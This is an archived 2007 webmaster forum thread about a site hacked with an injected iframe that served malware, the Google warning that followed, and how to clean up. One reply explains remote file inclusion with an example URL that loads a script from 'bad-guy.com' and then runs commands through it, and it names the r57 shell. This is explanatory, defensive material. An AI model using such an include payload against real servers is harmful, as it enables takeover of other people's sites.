It happens because someone hacked your server. The steps you need to take to remove the notice are explained in the Google notice itself, which ends you to StopBadware.org

Thank you Tedster,

For the last two hours or so, I am sweating cold out of fear of being banned by Google.

The site in question is my cherished one, and is performing excellently (at #2 or 3) for many keywords.

Upon checking, I noticed that a javascript code was inserted at the beginning of my index.html page (before the <head> tag. The code is an hexadecimal code. When converted to ASCII, it reveals an iframe pointing to an internet address that attempts to download a program (that crushes on my ME system).

Also, I noticed that the page was modified on March 2nd. That is to say, my homepage is running with that code for the last 10 days!

I immediately removed the code, and reported it to stopbadware.org.

Now, I am really trembling lest it may harm my site's ranking in the eyes of Google permanently. ):

I removed the IP address - we don't
want to spread viruses here either!

[edited by: tedster at 2:41 am (utc) on Mar. 13, 2007]

That javascripted iframe injection is really making the rounds right now. Be vigilant and be grateful to Google and to BadWare.org for taking up the battle.

Tighten up security on the server, change your passwords, and explain to google what has happened, your ranks should be fine.

I am also facing same Javascript iframe injection problem: [webmasterworld.com...]

The iframe code is not in our files ... but it still appears on user's computers, above our HTML code.

How did you solve it?

Jalinder:

I read your post. It seems somehow different. In my case, it is isoleted to a single html file (hopefully), and therefore easily corrected. I simply removed the virus loading script from the html page. That is to say, my page is not infected. It only attempts to download the virus into the user's computer. On the other hand, your server seems infected. I cannot call myself knowledgeable, but I think that you may need some virus checking software on the server side.

I can't find words for those who do that. We had similar issues not so long ago. The Iframe was not embedded into JS though.

We had to clean up the whole server and even buy another one just in case. It was a nightmare for 15 days. (from end of feb to 1 week ago).

I am still not sure how they managed to do that, so many times, randomly for so long, with 3 server admins sniffing around.

It attacked static files ending in *index.* all accounts were infected at the same time.

the iframe was redirecting to sites in russia. I still can't figure out why/how/when these sites will be banned forever, not talking about banning form Google but removing privilege of operating a domain.

If someone has more info about the procedures these hackers use it will be welcome I guess.

Tedster >> great info as usual.

selomelo:

Upon checking, I noticed that a javascript code was inserted at the beginning of my index.html page (before the <head> tag.

and, in a later message:

I read your post. It seems somehow different. In my case, it is isoleted to a single html file (hopefully), and therefore easily corrected. I simply removed the virus loading script from the html page. That is to say, my page is not infected.

Someone gained access to your machine. The attacker had (probably still has) the right to change files on your machine. This particular file seems to be clean at this moment, but you don't know what else they are doing that you are NOT seeing at this point.

Typical intrusion points are insecure PHP scripts and forms.

Please consider what someone can do who has file writing privileges on your server:

- use your machine as a storage space for file sharing (read: distribute illegal copies of new movies)
- use your machine to store and share child porn
- use your machine to send out millions of spam mails
- add your machine to a botnet and rent it for attacks (as in: blackmailing online businesses with DDOS attacks)
- download confidential info from your machine like credit card info, passwords
- use your machine as a landing platform for online fraud

They could as well use a new email account @your-machine.com.

You, as the owner of the machine, will be held responsible for all this.

Security has been breached on your system. There is only ONE reasonable reaction to this. As the system is compromised, it ought to be set up again from scratch, which means above anything else the underlying operating system must be re-installed. Afterwards, your HTML files can be copied back onto the machine.

"You, as the owner of the machine, will be held responsible for all this." I wouldn't go that far! I have never heard of anyone getting prosecuted for said scenarios.

WeirdCode:

Thank you for your comments. In fact, the affected page is a static html file. It contains no php script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting the my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.

One more thing.

After hacking, even if my ranking is not affected, it is certain that the image of my site will suffer for the duration of the warning notice. Being a spammer or a malware owner in the eyes of visitors is not something to be welcomed.

When it comes to punishing, Google is really quick to act. But, as an innocent victim of a malicious attack, I would like to be warned before placing a warning notice for the surfers. This can be considered at least for those webmasters who already have an account with google through webmaster tools, adwords, or adsense. Google has my full contact details, and if Google had sent me a message (automatic or not), I would immediately remove the injected code, and be very grateful indeed.
Now, I have to resort to a roundabout way, and wait until someone reviews my site, notify Google, etc. This, imho, is really sad.

[edited by: tedster at 1:03 am (utc) on Mar. 14, 2007]

Yes Google could have informed you first. OTOH, if not for that warning you'd still be injecting spyware onto people's computers. Bottom line is that they had to do your job for you. I'm not hearing that gratitude.

Yes Google could have informed you first. OTOH, if not for that warning you'd still be injecting spyware onto people's computers. Bottom line is that they had to do your job for you. I'm not hearing that gratitude.

I got a vicious trojan once because I visited an infected site, which took me days to finally remove. I agree with you, webmasters shouldn't be whining about losing ranking on Google because they weren't notified and the world didn't stop to make sure their feelings weren't hurt. It's up to webmasters to have secure web sites and be vigilant about it. They should be more worried about the hundreds of computers they infected rather than their precious little web sites getting a bad rep.

In order to modify your static html page, the hacker must first get write access to your server. The modification of your page wasn't the attack. The attack was when they got into your server. If you haven't identified and closed the route by which they got in, they can come right back and do it again.

Changing your password was a good first step. If your password was a bad one, then that would have been an easy (and common) avenue of attack.

If your password was a strong one, then they probably got in by some other method, and that's what you need to investigate.

Consideration for non-Google traffic

On second thought, I see that friends like Jomaxx and Koan have a point in saying that notifying the wembaster would not save uninformed surfers. It is probable that computers of hundreds of visitors were already exposed to the malware due to the injected javascript code on my page before I got aware of the situation.

But I have a reservation here: Google is not the only source of traffic for the websites. After Google's malware warning, my traffic dropped by 60%. Now, I receive traffic from other search engines, from relevant directories, forum discussiens, etc. So, visitors coming from these sources are not aware of the potential malware, and therefore are exposed to them. Should Google notified besides placing a warning, remaining 35% of the visitors could be saved.

Interestingly, I still receive a decent traffic from google in spite of the warning note. When a visitor clicks link to my site, he/she is not directly transferred to the site, but instead to a warning page. Some visitors seem ignoring this warning page. I can say that 20% of my current traffic is referred by Google!

Seriously - if you haven't found out how they changed the file in the first place - expect them to put the virus back again pretty soon. Change all passwords, upgrade all scripts, and analyse your logs in great detail at the date and time the file was modified.

- use your machine as a storage space for file sharing (read: distribute illegal copies of new movies)

Any tips on getting people to do this to my server? (dreams of logging in and seeing a library of new movies!)

Google should give a reasonable amount of time for the website owner to fix the problem.
Most websites are harmless and they must know that.
Sometimes being hacked takes a few days/weeks before all problems are solved, EVEN if you are a responsible webmaster.

If I understand correctly most of the time these hacks point to the exact same sites and I think that meaures should be taken to put down companies generating such problems in the first place.
Penalizing webmasters is temporary solution, put down spam networks legally/officially for what they do and prevent them from owning any internet property is the way to go.

I think that they should try to contact webmasters, where they have details.

selomelo:

Thank you for your comments. In fact, the affected page is a static html file. It contains no php script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting the my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.

Maybe I should explain this a little more extensively. We had a similar problem on our server. It was abused for file sharing though. We had a CMS running, which had a remote file inclusion vulnerability. (Mind you, this is only one example among many many other possibilities). I'll simplify it a little.

The CMS would call a subroutine:

http://www.my-server.com/include=my_subroutine

The input of "my_subroutine" was not sanitized - a flaw in the software. All the attacker had to do was:

http://www.my-server.com/include=http://bad-guy.com/malicious_code.php

"malicious_code" would be, for example, a shell script. This script was stored on my server, and then this guy could call

http://www.my-server.com/malicious_code.php?command=[many nasty things]

So they installed their own server management software by means of a flawed piece of software, and from that moment on they could manipulate the system. Including static html pages like those on your site. In other words, the weak point is NOT the HTML file you are looking at. The problem is somewhere else. Someone gained and most likely still has access to your system, and they are able to do with your files whatever they want. And if they are really really clever they will do it without any obvious sign.

Do you have sensitive information in a mysql database, like credit card info of your customers? These PHP shell scripts may have a mysql access too. Add a weak mysql passwort to this, and they are already selling your confidential info to interested third parties.

Your machine is compromised. You can't trust it any longer.

You may want to google for expressions like "root kit", "r57 shell", "remote file inclusion", then you will get an idea of what happened to your server. The altered html file is but the tip of the iceberg. By means of an additional kernel vulnerability they may have even gained root access. This would mean that they can show you whatever they want, while they are doing something else.

A compromised server in the hands of an unknown attacker is the cyberspace equivalent to a loaded gun in the hands of whoverer in a busy mall. Once they have gained access to your system, and they did, they can do ANYTHING. Including sending death threats to the president, if they wish. You'd have a hard time saying "But it wasn't me, it was someone else." It's your system, you are responsible.

Let's assume you're buying something at ebay or amazon, your credit card info is stolen from their hacked server, and your accounts are billed to like crazy. Imagine you complain (Hey, I've only bought this book at $10, not the holiday home at $2.000.000), and they would say: "Oh, we are so sorry, but we are not liable. You see, it was someone else."

I'm sure you get the picture.

BTW the intrusion did not necessarily originate from your own account on that server. If it's virtual hosting, maybe a different web site was hacked, and by means of privilege escalation they are working their way through all accounts on that server now. Maybe you should talk to your provider. If your site is on a dedicated server, and if you are the owner, you should reset it immediately.

I had the same problem, with two hacked sites with java redirects to a russian site. The IP that changed the the files on my domains was from the US. Two different domains hosted by two different providers with very strong passwords. Both domains have only static html pages with no database like mysql, no fileupload and no php. I think someone installed badware on my workstation and read the local ftp password database of the ftp programm or was listning to my ftp connection. I´m using a firewall and a antivirus software on that workstation. So it wasn´t a attack to the server, it was an attack to my workstation.
BTW Not only sites with badware on their will get the harm sign, also sites that link to a page with badware on a different domain.

I've seen at least one report that Google is notifying webmasters (by any email avenue they can discover in their files or on your site) when they believe a site has been hacked. It appears that in your case they didn't do so, or didn't do it before issuing the warning, but apparently it is something they've started doing:

[googlewebmastercentral.blogspot.com...]

Google should give a reasonable amount of time for the website owner to fix the problem. Most websites are harmless and they must know that... Penalizing webmasters is temporary solution.

I disagree on that. Google's desire would be to protect their surfers, not the webmasters, and the warning should go up immediately. Webmasters can use a drop in Google traffic as an indicator of a problem to investigate.

They're not penalizing the webmaster or the site, just warning surfers. Consider: if your site is trying to infect all its visitors with a virus, do you still want people to come visit it? I would hope not.

Google no doubt knows that more than 99.9% of all websites are non-malicious, and in fact that is probably one test they use to distinguish what constitutes a hack. If your site is about archaeology in Colorado and suddenly sprouts porn links, that's obviously not normal.

torson
That is quite an interesting situation.

I think someone installed badware on my workstation and read the local ftp password database of the ftp programm or was listning to my ftp connection.

Was this at work or at least some computer over which you didn't have total control (i.e. not your home PC)?

Were you using firewall and antivirus software at the time of the hack? Or start using them afterward? The obvious question would be, how would badware get in, with those in place?

Did you find and identify the badware?

[edited by: SteveWh at 11:16 pm (utc) on Mar. 14, 2007]

Was this at work or at least some computer over which you didn't have total control (i.e. not your home PC)?

My computer, no one else is working with

Were you using firewall and antivirus software at the time of the hack? Or start using them afterward? The obvious question would be, how would badware get in, with those in place?

The computer was protected all the time, but it is not obvious because antivir programs are always one step behind.

Did you find and identify the badware?

This is what makes me nervous. I used 3 different antivir programs for checking the computer, but I found nothing.

The only connection between the two domains hosted by different providers is my workstation. There are no scripts running on the domains, only simple pure html pages. The badware on both domains were installed on the same day by updating the index page via ftp. Just one connect, got the file (insert the code by hand? ~1 minute until send) renamed the page, sent a new page and bye. At the time the problem happened, there were also for 4 other domains saved with the complete connection profile in my ftp program. Only two domains were affected. Very strange, I´m not sure what happened, but the only chance to get the passwords was my computer. I think the computer needs a new installation, a lot of work but it´s nescesarry.

Everything about that M.O. sure brings back memories, including the 1 minute (or even less) processing time between download and the completion of the re-upload. I suspect a well automated robot, probably not hand-editing.

I'm always skeptical about password-interception theories, but it is technically possible, so you can't completely discount it.

Since you know the IP address of the hacker (it's in your FTP log), you can block them in .htaccess. That's one line of protection.

But your story is the kind that makes me nervous, too. Strong password. Pure HTML... I'd suggest the possibility of a hacker having gained server-wide access through some other account - but not at two different hosts at once! Or maybe so. Don't know. If you haven't already notified your hosts, it might be worth doing so. They might want to do a sweep of their entire clientele to check for other affected sites.

[edited by: tedster at 7:29 am (utc) on Mar. 15, 2007]

Sure, I sent an email to my hosts, but providers have no security issues. Not in public ;-), but this time it´s true. I have shared server contracts and I was checking about 30 domains on both ips of my domains without any results. Only my domains were infected. May your intruder had the same ip (131.229.183.nnn). But if I do things like hacking a website I would use proxies or an other hacked computer.

Good News: Google removed the warning note.

WeirdCode & SteveWH:

Thank you for your insightful comments. Now, I am studying some papers on vulnerabilities involving php, as my site hosts a dictionary with some php code. However, I have a suspect. A free php script that I installed recently has an upload option for updating database. But this updating script is not password protected. I do not know if the coder delibrately left it as it is, but it might be culprit. So I deleted it.

As to Google's removal of the warning note: I applied to stopbadware.org for review. But my site's status is still "underetmined" at stopbadware.org. Meanwhile, Google recrawled my site the day before yesterday.

Right now, I see that Google removed the warning note with a fresh cache dated 13th March.

This may mean that after re-crawling and analysing the page, Google chose to remove the note, and did not wait for a report from stopbadware.org. This is really a good news for me, and may be a good news for anyone concerned.

As a side note, I see a rapid increase in the number of reported sites at stopbadware.org. On 12th Feb, the number of sites reported was around 25,900. Today, I read the number as above 27,300. This means that within just 3 days, around 1500 new sites were reported. This is really alarming.

torson,

May your intruder had the same ip (131.229.183.nnn).

I should clarify that my site didn't actually get hacked, but those of people I correspond with did. That's odd, your IP traces to Smith College, LOL. Maybe one hacker there, but not a corporate hacking empire, I think. No, the ones I remember traced to Russia, successfully hacked tens of thousands of sites.

selomelo,

I'm glad to hear it was easy to clear up with Google. If the process stays that streamlined, then it will help everyone.

Your suspect sounds like a "possible". If it takes any input from a user OR from a URL OR from a cookie, it also needs to "escape" it (clean it) before it uses it for any type of database access, to avoid injection attacks.